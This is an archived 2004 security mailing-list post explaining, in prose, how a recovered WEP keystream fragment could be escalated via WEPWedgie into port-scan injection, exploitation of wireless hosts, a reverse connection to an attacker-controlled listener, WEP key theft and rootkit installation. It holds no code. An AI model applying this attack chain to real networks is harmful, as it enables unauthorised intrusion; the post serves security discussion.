From: Andrew A. Vladimirov (mlists@arhont.com)
Date: Fri May 21 2004 - 10:35:07 EDT
Aaron Drew wrote:
> I would love to be enlightend but
> I fail to see how this is 'full access' given that it only provides the PRN
> sequence of a single IV/Key pair. Since AP's use different IV's for each
> packet transmitted, how is it possible to use their PRN discovery technique
> to gain access to packets encrypted with all other IV's?
You can obtain the full access, but only very laterally :)
1. Get a piece of the keystream using the weakness of the authentication
via WEP if this method is used (current WEPWedgie version does that) or
via predictable packets (ARP, DHCP, TCP SYN's and SYN-ACK's etc. -
second version of WEPWedgie will do that).
2. Use that piece for injecting portscans into the WLAN a la WEPWedgie.
3. On the basis of the portscans data, use the known piece of keystream
to inject exploit code against hosts that are likely to be vulnerable.
4. Upon exploitation, a reverse connection must be established to a
listener on the wired side. Then you can grab the WEP key, install your
favourite rootkit and so on :)
Of course, all of this is highly conditional, for example there must be
a host on the wired side that you control, e.g. the traffic from the
WLAN should be routable to the Internet. The hosts on the WLAN side must
be vulnerable to exploitation, but in my experience this is often the
case with unpatched / default install machines behind the firewall.
Cheers,
Andrew
--
Dr. Andrew A. Vladimirov
CISSP #34081, CWNA, CCNP/CCDP, TIA Linux+
CSO
Arhont Ltd - Information Security.
Web: http://www.arhont.com
http://www.wi-foo.com
Tel: +44 (0)870 44 31337
Fax: +44 (0)117 969 0141
GPG: Key ID - 0x1D312310
GPG: Server - gpg.arhont.com
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:54 EDT